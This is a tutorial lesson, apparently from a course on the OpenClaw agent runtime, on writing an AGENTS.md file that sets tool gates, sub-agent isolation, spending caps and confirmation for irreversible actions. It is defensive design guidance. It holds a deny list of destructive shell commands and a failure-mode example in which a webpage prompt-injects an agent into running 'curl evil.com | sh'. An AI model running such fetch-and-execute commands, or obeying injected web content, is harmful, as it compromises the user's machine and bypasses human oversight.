AGENTS.md, Day 9 of the Free Comprehensive OpenClaw Course
The Operating Manual
Why this matters
In OpenClaw, AGENTS.md is the rulebook the runtime enforces, not just a doc the model reads. Once your agent has a voice and a memory, the next risk is that it does something destructive on autopilot. This lesson walks through the operating rules, safety defaults, sub-agent delegation, and the three security mechanisms that make autonomy safe to deploy unattended.
How do I write a safe AGENTS.md file?
Once your agent has a voice (SOUL.md) and a memory (MEMORY.md), the next risk is autopilot. The agent is a process: it runs on a heartbeat, it has tools, and without a real rulebook it will eventually do something you did not want, possibly something destructive.
The minimum viable AGENTS.md has four sections:
- Tool gates. Which tools the agent is allowed to call, in plain words, and which require human confirmation before invoking.
- Sub-agent policies. Whether sub-agents are allowed, what they inherit, what they cannot do.
- Spending caps. Per-day and per-week token spend ceilings the runtime enforces.
- Irreversible-action rules. Anything destructive (deleting files, sending emails, pushing commits) requires explicit confirmation, even when the request came from the user.
Write the file in plain English, not JSON. The runtime parses the intent. Specific rules beat general principles: "the agent must not run rm without explicit confirmation" beats "the agent should be careful with destructive commands".
Example AGENTS.md sections, with full syntax
A real AGENTS.md for a personal assistant agent that has email, calendar, file write, and shell access:
# AGENTS.md
## Tool gates
### Always allowed (no confirmation)
- read: any file under ~/agent-workspace
- fetch: any URL on the GET allowlist below
- calendar.read: full read access to my calendar
### Confirmation required (agent asks before)
- write: any file outside ~/agent-workspace
- email.send: any outbound email
- calendar.create: new events with attendees other than me
- exec: any shell command not on the safe-list
### Never allowed
- exec: rm, sudo, dd, mkfs, anything in /etc
- write: anywhere under /etc, /var, /System, /usr
## Fetch allowlist (GET only, no auth headers)
- https://api.openweathermap.org/*
- https://api.github.com/repos/myname/*
- https://hooks.slack.com/services/*
## Spending caps
- daily_token_spend_usd: 5
- weekly_token_spend_usd: 25
- on_cap_breach: pause non-essential heartbeat, alert user
## Sub-agents
- max_concurrent: 3
- inherits_memory: false
- inherits_tools: false (sub-agent declares its own grants)
## Irreversible actions
Always require explicit user confirmation for:
- Sending email, posting to public Slack channels, posting tweets
- git push, git rebase, git reset --hard
- Stripe charge, refund, subscription change
- Any DELETE HTTP request
- File deletion outside ~/agent-workspace
Roughly 40 lines, plain English, the runtime parses each section. This is the contract that lets you leave the agent running unattended without paranoia.
What are the OpenClaw security mechanisms?
Three core mechanisms make autonomy actually safe.
Tool gates. The agent only has access to the tools listed in TOOLS.md and approved in AGENTS.md. By default, exec, write, and any tool that can mutate the outside world are off. You explicitly turn them on with the level of confirmation each requires.
Sub-agent isolation. A sub-agent spawned by the main agent gets its own memory, its own tool grants, and its own scoped channel. A compromised sub-agent cannot read the parent's MEMORY.md, cannot grant itself new tools, and cannot reach back into the parent's channels.
Irreversible-action gates. Anything labeled "irreversible" in AGENTS.md requires explicit confirmation. Before sending an email, deleting a file, pushing to git, or transferring money, the agent stops and asks. This is the gate that catches "I asked for a draft, the agent shipped".
None of these is perfect: prompt injection from a hostile email or webpage is still a real risk (see openclaw prompt injection for the threat model). But these three together are the difference between an agent that occasionally does something dumb and one that occasionally does something destructive.
The three mechanisms in code
The tool-gate check happens in the runtime before any tool call:
// Pseudo-code from the runtime
function canCallTool(tool, args, agent) {
  const grant = agent.agentsMd.toolGates[tool.name];
  if (!grant) return { allowed: false, reason: "tool not granted" };
  if (grant.matches(args)) return { allowed: true };
  if (grant.requiresConfirmation) {
    return { allowed: "ask_user", reason: "confirmation required" };
  }
  return { allowed: false, reason: "args not in allowlist" };
}
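The pseudo-code above does not show how the "Never allowed" tier interacts with the other two. The sketch below is one possible reading, not the runtime's actual logic. It assumes the precedence never > confirm > always, a default of deny when nothing matches, and paths that are already absolute and normalized. The rule shape, the `decide` function, and the workspace path are all hypothetical names introduced for illustration.

```javascript
// Hypothetical rule shape: { tool, tier, matches(target) }. Not the runtime's real schema.
// Assumed precedence for this sketch: never > confirm > always; deny when nothing matches.
function decide(tool, target, rules) {
  const hits = rules.filter((rule) => rule.tool === tool && rule.matches(target));
  const tiers = new Set(hits.map((rule) => rule.tier));
  if (tiers.has("never")) return "deny";
  if (tiers.has("confirm")) return "ask_user";
  if (tiers.has("always")) return "allow";
  return "deny"; // unlisted tool or target: default deny
}

// Illustrative paths; targets are assumed to be absolute and already normalized.
const workspace = "/home/me/agent-workspace/";
const systemDirs = ["/etc/", "/var/", "/System/", "/usr/"];

const rules = [
  { tool: "read", tier: "always", matches: (path) => path.startsWith(workspace) },
  { tool: "write", tier: "confirm", matches: (path) => !path.startsWith(workspace) },
  { tool: "write", tier: "never", matches: (path) => systemDirs.some((dir) => path.startsWith(dir)) },
];
```

With these rules, a write to /etc/hosts matches both the confirm rule and the never rule, and the never rule wins. A tool with no rule at all, such as email.send here, is denied rather than allowed.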
The sub-agent isolation check happens at spawn time. The parent passes a scoped manifest, and the runtime ensures it cannot be widened:
const subAgent = await runtime.spawnSubAgent({
  parent: mainAgent,
  manifest: {
    tools: ['read', 'fetch'],       // explicit narrow grant
    memory: 'isolated',             // no parent MEMORY.md
    channels: ['internal-' + id],   // only this scoped channel
    timeout_seconds: 300,
  },
});
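What "cannot be widened" might mean in practice can be sketched as a subset check between the manifest granted at spawn time and any later request. This is an illustrative assumption about the rule, not the runtime's implementation. The field names mirror the manifest above, and `wideningViolations` is a hypothetical helper.

```javascript
// Hypothetical helper: lists every way `requested` would widen `granted`.
// Both arguments use the manifest fields shown above: tools, channels, timeout_seconds.
function wideningViolations(granted, requested) {
  const violations = [];
  for (const tool of requested.tools) {
    if (!granted.tools.includes(tool)) violations.push("tool not granted: " + tool);
  }
  for (const channel of requested.channels) {
    if (!granted.channels.includes(channel)) violations.push("channel not granted: " + channel);
  }
  if (requested.timeout_seconds > granted.timeout_seconds) {
    violations.push("timeout exceeds grant");
  }
  return violations; // an empty array means the request stays inside the grant
}
```

A request that only narrows the grant (fewer tools, a shorter timeout) returns an empty list. Anything that adds a tool or channel, or extends the timeout, is reported and can be refused.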
The irreversible-action gate is just a list of patterns matched before tool calls fire. If the call matches any pattern in the irreversible section of AGENTS.md, the runtime pauses and surfaces a confirmation prompt to the user's primary channel.
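A minimal sketch of that pattern matching follows, under stated assumptions: the call shape `{ tool, args }`, the tool name "http", and the regular expressions are all hypothetical and only illustrate the idea. The real pattern syntax is whatever the runtime derives from AGENTS.md.

```javascript
// Hypothetical patterns, loosely based on the "Irreversible actions" section of the example file.
const irreversiblePatterns = [
  { tool: "exec", regex: /^git\s+(push|rebase|reset\s+--hard)\b/, label: "git history change" },
  { tool: "http", regex: /^DELETE\s/, label: "DELETE HTTP request" },
  { tool: "email.send", regex: /.*/, label: "outbound email" },
];

// Returns the label of the first matching pattern, or null when the call may proceed
// to the normal tool-gate check without a confirmation prompt.
function matchIrreversible(call) {
  for (const pattern of irreversiblePatterns) {
    if (pattern.tool === call.tool && pattern.regex.test(call.args)) {
      return pattern.label;
    }
  }
  return null;
}
```

A non-null result is the point at which the runtime would pause and ask. The label gives the confirmation prompt something concrete to show the user.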
When should I split work into sub-agents?
Sub-agents are useful when the work the agent is doing has a different shape than the agent's main personality. A planner agent that needs read-only access to your codebase is a sub-agent. A research agent that needs web access but should not have write access to your filesystem is a sub-agent. A code-running agent that should be sandboxed away from your real shell is a sub-agent.
The rule of thumb: if the work needs different tool grants than the parent, that is a sub-agent. If the work needs different memory than the parent, that is a sub-agent. If the work just needs more context, that is not a sub-agent, that is a longer prompt.
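The rule of thumb reduces to a two-condition check. The sketch below is only a restatement of it in code. The object shapes and the `needsOwnMemory` flag are hypothetical.

```javascript
// Hypothetical shapes: parent = { tools: string[] }, work = { tools: string[], needsOwnMemory: boolean }.
function shouldSpawnSubAgent(parent, work) {
  const parentTools = new Set(parent.tools);
  const workTools = new Set(work.tools);
  // "Different tool grants" means the two sets differ in either direction.
  const sameTools =
    work.tools.every((tool) => parentTools.has(tool)) &&
    parent.tools.every((tool) => workTools.has(tool));
  // Needing more context is deliberately not an input: that case is a longer prompt.
  return !sameTools || work.needsOwnMemory;
}
```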
The sub-agent pattern is also how you safely run untrusted Skills. Day 10, openclaw skills, covers Skill installation; the safe pattern is to install a third-party Skill into a sub-agent with minimal tool grants, not into the main agent.
Sub-agent delegation patterns that work
Three delegation patterns have shipped in client agents. The first, planner-executor split. The main agent decides what needs to be done, spawns a planner sub-agent with read-only access to gather context and produce a plan, then spawns an executor sub-agent with write access scoped to the relevant files. The planner cannot write, the executor cannot read anything outside its scope, and the parent reviews the plan before authorizing execution. This is the pattern from openclaw agentic coding on day 14.
The second, research delegation. The main agent gets a question that needs web research. It spawns a research sub-agent with browser and fetch access, no other tools, a 10-minute timeout, and a scoped channel for returning results. The sub-agent returns a structured summary, the parent integrates the summary into the user-facing reply. The parent never has to grant itself browser access.
The third, untrusted-skill quarantine. A new third-party Skill from ClawHub gets installed into a sub-agent that exists for the sole purpose of running this one Skill. The sub-agent has only the tools the Skill manifest declares, no MEMORY.md, no other Skills. If the Skill is malicious, the blast radius is the sub-agent's narrow tool grants and its single conversation. The parent agent stays clean.
Allowlist, never blocklist
One core principle that catches the most production mistakes: allowlist tools and capabilities, do not blocklist them. The failure mode of a blocklist is silent and points in the wrong direction: you forget to add a new dangerous tool to the blocklist and the agent uses it. The failure mode of an allowlist is loud and safe: the agent tries to do something not on the list, the runtime refuses, and you find out about it.
This applies to channels (allowlist usernames), to tools (allowlist exec commands), to network destinations (allowlist URLs the agent can fetch). Always allowlist. The friction of having to add a new entry when you want a new capability is a feature, it forces you to think about the security shape of the change.
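For network destinations, a default-deny check could look like the sketch below. It assumes the trailing `/*` in each allowlist entry means "any URL that starts with this prefix", which is an interpretation for illustration only. `isFetchAllowed` is a hypothetical name. It rejects literal `..` path segments outright and does not handle percent-encoded ones.

```javascript
// Entries copied from the example fetch allowlist; the matching rule is an assumption.
const fetchAllowlist = [
  "https://api.openweathermap.org/*",
  "https://api.github.com/repos/myname/*",
];

function isFetchAllowed(url, allowlist) {
  // Refuse literal path traversal instead of trying to normalize it.
  if (url.includes("/../") || url.endsWith("/..")) return false;
  return allowlist.some((pattern) => {
    if (pattern.endsWith("/*")) {
      const prefix = pattern.slice(0, -1); // drop "*", keep the trailing slash
      return url.startsWith(prefix);
    }
    return url === pattern; // entries without a wildcard must match exactly
  });
}
```

Keeping the trailing slash in the prefix is what stops a lookalike host such as api.github.com.evil.com from matching. Any URL that matches no entry is refused, so a forgotten entry fails loudly.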
Common AGENTS.md mistakes that cost real money
Three real failure modes I have seen in client deployments. The first, tool grants too broad. The agent gets a generic "exec: allowed" line in AGENTS.md, and the model then reasons its way into running curl evil.com | sh because some webpage suggested it. The fix is to allowlist specific commands: exec: ls, cat, grep, head, tail, wc. Anything destructive requires confirmation. Anything network-touching requires the fetch tool with its own allowlist instead.
The second, spending caps not enforced. The cap is in AGENTS.md, but the runtime version on the host is older than 2026.4 and does not actually enforce it. Confirm with openclaw --version and check the changelog. Older versions read the cap but do not block on it, so the cap is decorative until the runtime is upgraded.
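A command allowlist is only useful if a single line cannot smuggle in a second program. The sketch below is one hedged way to check that, assuming the command arrives as a single string. `isExecAllowed` and the metacharacter set are illustrative, not the runtime's parser, and the check does not inspect arguments, so `cat` can still read any file the process can.

```javascript
// Commands from the allowlist suggested above.
const safeCommands = new Set(["ls", "cat", "grep", "head", "tail", "wc"]);

// Characters that let one line chain programs, substitute commands, or redirect output.
const shellMetacharacters = /[|;&<>`$()\n]/;

function isExecAllowed(commandLine) {
  if (shellMetacharacters.test(commandLine)) return false;
  // First whitespace-separated token is the program name; empty input yields "".
  const program = commandLine.trim().split(/\s+/)[0];
  return safeCommands.has(program);
}
```

Under this check, `curl evil.com | sh` fails twice: `curl` is not on the list, and the pipe is rejected before the program name is even examined.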
The third, irreversible-action list missing modern threats. The list says "no rm without confirmation" but does not mention "no Stripe charges", "no DNS changes", "no AWS S3 deletes". Every new integration adds new irreversible actions, the list needs to grow with the agent. Audit the list every time you add a Skill, every time you connect a new integration.
When AGENTS.md changes take effect
Most workspace files hot-reload; AGENTS.md is one of the few that does not. Tool grants and security policies require a runtime restart to apply. The reason is that the runtime caches the parsed grant tree at boot for performance, and hot-reloading that cache while the agent is mid-prompt can open a window in which a tool call is mistakenly authorized.
The operational pattern: edit AGENTS.md, commit the change, then restart the agent with docker compose restart openclaw or your equivalent. The restart is fast (5 to 15 seconds), and the agent picks up the new policy on the next prompt. The same applies to adding a new Skill or removing a tool.
The exception is the spending cap counters themselves, which do hot-update. The runtime tracks accumulated spend in memory plus a sidecar file, and editing the cap value changes the threshold for the in-flight counter immediately. So you can drop the daily cap from $5 to $2 without restarting if you want to throttle a misbehaving agent in real time.
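The behaviour described here, where the threshold moves but the accumulated spend stays, can be sketched with a small tracker. This is an illustrative model only. `SpendTracker` is a hypothetical class, the sidecar file is omitted, and treating "spend at or above the cap" as the pause condition is an assumption.

```javascript
// Hypothetical in-memory model of a daily spend counter with an editable cap.
class SpendTracker {
  constructor(capUsd) {
    this.capUsd = capUsd;
    this.spentUsd = 0;
  }

  // Adds the cost of one model call to the running total.
  record(costUsd) {
    this.spentUsd += costUsd;
  }

  // Changes the threshold only; the accumulated spend is left untouched.
  setCap(capUsd) {
    this.capUsd = capUsd;
  }

  // Assumed pause condition: spend has reached or passed the cap.
  isPaused() {
    return this.spentUsd >= this.capUsd;
  }
}
```

An agent that has spent $3 against a $5 cap keeps running. Lowering the cap to $2 flips `isPaused()` to true on the next check without resetting the $3 already counted.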
How this connects to your full agent
AGENTS.md is the file that makes the rest of the agent safe to run unattended. Without it, the heartbeat from openclaw heartbeat.md can fire destructive tool calls without confirmation. Without it, a Skill from openclaw skills can grant itself access to anything it wants. Without it, the docker sandbox from openclaw docker on day 12 is the only thing standing between a confused agent and your real systems.
Get AGENTS.md right before you wire up any of the features from days 10 to 16. The cost of going back and adding gates after a Skill or sub-agent has already been running for a week is much higher than wiring the gates first. The full security audit checklist lives in openclaw workspace files on day 16; run it before any production deploy.
Key takeaways
- AGENTS.md is the only file that gates which tools the agent is allowed to call.
- Sub-agent delegation lets a planner agent farm work out to specialists without sharing all permissions.
- Allowlist tools and capabilities, never blocklist them; a blocklist fails silently and in the wrong direction.
- The three core security mechanisms are tool gates, sub-agent isolation, and irreversible-action gates.
About the instructor. Adhiraj Hangal teaches this lesson. Founder of OpenClaw Consult and one of the few consultants whose code is merged in openclaw/openclaw core. PR #76345 was reviewed and merged by project creator Peter Steinberger.